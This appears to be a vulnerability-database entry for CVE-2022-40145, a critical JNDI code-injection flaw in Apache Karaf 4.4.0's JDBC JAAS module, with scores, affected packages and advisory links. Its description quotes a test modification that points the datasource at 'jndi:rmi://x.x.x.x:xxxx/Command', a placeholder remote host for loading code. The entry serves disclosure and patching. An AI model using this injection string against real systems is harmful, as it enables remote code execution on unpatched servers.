CVE-2022-40145

Severity: 9.8 CRITICAL
EPSS: 5.4% (top 9.88%)
CISA KEV: Not in KEV
Exploit: No known exploits
Timeline: Published Dec 21

Description

This vulnerability is about a potential code injection when an attacker has control of the target LDAP server used in the JDBC JNDI URL. The function jaas.modules.src.main.java.org.apache.karaf.jaas.modules.jdbc.JDBCUtils#doCreateDatasource uses InitialContext.lookup(jndiName) without filtering. A user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This

CVSS vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploitability: 3.9 | Impact: 5.9

Affected Packages (3 packages)

Source | Package | Affected | Fixed
NVD | apache/karaf | 4.4.0 | 4.4.2 (+1)
Maven | org.apache.karaf:apache-karaf | 4.4.0 | 4.4.2 (+1)
CVEListV5 | apache_software_foundation/apache_karaf | 4.4.0 | 4.4.2 (+1)

🔴 Vulnerability Details (3)

CVEList: Apache Karaf: JDBC JAAS LDAP injection (2022-12-21)
OSV: Apache Karaf vulnerable to potential code injection (2022-12-21)
GHSA: Apache Karaf vulnerable to potential code injection (2022-12-21)

📋 Vendor Advisories (1)

Red Hat: karaf: JDBC JAAS LDAP injection (2022-12-21)